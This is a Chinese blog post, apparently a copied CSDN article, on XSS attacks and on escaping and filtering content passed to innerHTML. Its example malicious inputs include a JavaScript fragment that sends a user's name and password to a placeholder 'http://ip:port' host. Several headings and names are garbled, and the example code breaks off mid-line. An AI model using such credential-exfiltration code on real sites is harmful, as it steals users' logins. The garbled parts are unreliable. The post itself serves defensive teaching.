前端xss攻击——规避innerHtml过滤标签节点及属性

慈云数据 8个月前 (04-23) 技术支持 43 0

文章目录

    • ⭐前言
    • ⭐规避innerHtml
      • https://blog.csdn.net/qq_38870145/article/details/1f496;在iframe中使用innerHtml的场景
      • https://blog.csdn.net/qq_38870145/article/details/1f496;标签转义
      • https://blog.csdn.net/qq_38870145/article/details/1f496;url 进行encode
      • https://blog.csdn.net/qq_38870145/article/details/1f496;手动过滤内容+转义
      • ⭐inscode代码块演示
      • ⭐结束

        ymahttps://blog.csdn.net/qq_38870145/article/details/16-logo

        ⭐前言

        大家好,我是ymahttps://blog.csdn.net/qq_38870145/article/details/16,本文分享xss攻击——规避innerHtml过滤script等动态js节点。

        xss攻击

        XSS(Cross-Site Scripting)攻击是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本代码注入到网页中,当用户通过浏览器访问这个网页时,这些恶意代码就会被执行,从而使攻击者能够窃取用户的敏感信息,如登录凭据、个人信息等。

        XSS攻击一般可以分为三种类型:

        1. 存储型XSS:攻击者将恶意脚本代码存储到目标网站的数据库中,当用户访问含有恶意代码的页面时,代码会从数据库中被提取并执行。
        2. 反射型XSS:攻击者构造一个含有恶意代码的URL链接,当用户点击这个链接时,恶意代码会被注入到响应页面的参数中并执行。
        3. DOM型XSS:攻击者通过修改和篡改页面的DOM结构来实现攻击,一般通过修改URL参数或表单数据来触发。

        为了防止XSS攻击,开发者可以采取以下几种措施:

        • 输入验证和过滤:对用户输入的数据进行验证和过滤,只允许合法的输入。
        • 转义输出:在向用户输出数据时,对特殊字符进行转义处理,防止恶意代码被执行。
        • 设置HttpOnly标志:在设置Cookie时,添加HttpOnly标志,使得Cookie只能通过HTTP协议传输,防止被恶意脚本窃取。
        • 使用内容安全策略(Content Security Policy,CSP):CSP可以帮助开发者限制网页中可以执行的脚本来源,从而有效防止XSS攻击。

          总之,XSS攻击是一种常见而危险的漏洞,开发者和用户都需要注意防范和注意保护个人信息的安全。

          ⭐规避innerHtml

          inner的危险

          使用innerHtml属性可以直接操作和修改HTML内容,但是也存在一定的危险性。以下是一些内涵Html属性的潜在风险:

          1. 跨站脚本攻击(XSS):如果输入的内容没有经过适当的验证和过滤,恶意用户可以插入恶意脚本代码,从而实现跨站脚本攻击。这些恶意脚本可以用来窃取用户的个人信息、篡改网页内容或发送恶意行为。

          2. 不安全的内容插入:使用innerHtml属性可以直接插入内容,但如果不进行适当的验证和过滤,可能会导致插入不安全的内容,例如从不受信任的来源获取的脚本、链接或其他恶意代码。

          3. CSS注入:通过innerHtml属性,恶意用户可以插入恶意的CSS代码,从而导致网页的样式受到破坏,或者被重定向到其他网页。

          4. 内容失去结构:使用innerHtml属性可以直接修改HTML结构,但如果不小心操作,可能导致内容失去原有的结构和语义,影响网页的可访问性和可维护性

          为了减少这些风险,开发者应该始终对输入的内容进行适当的验证、过滤和转义,以防止XSS攻击和其他安全问题。建议使用安全的API或框架来处理HTML内容,例如使用textContent属性来修改文本内容,或使用DOM操作方法来修改元素的属性和子元素。

          https://blog.csdn.net/qq_38870145/article/details/1f496;在iframe中使用innerHtml的场景

          iframe直接渲染html字符串

           // innerHtml渲染iframe
           const innerHtmlIframe = () => {
               const doc = document.getElementById('iframe-id').contentWindow.document;
               const iframeHtmlDom = doc.getElementsByTagName('html')[0];
               iframeHtmlDom.innerHTML = getHtml()
           }
          

          某个document直接使用innerHtml

          documnet.getElementById('test').innerHTML = '恶意脚本'
          

          恶意代码运行的效果:点击链接运行js弹出一个弹框

          xss-html

          恶意的输入内容

          style标签

           
          

          svg标签

          
                      //我们现在假如 user和pass是我们利用js获得的用户的用户名和密码
                      user="admin";
                      pass="root";
                      url="http://ip:port/?user="+user+"&pass="+pass;
                      var frame=$("
           
           
          
微信扫一扫加客服

微信扫一扫加客服

点击启动AI问答
Draggable Icon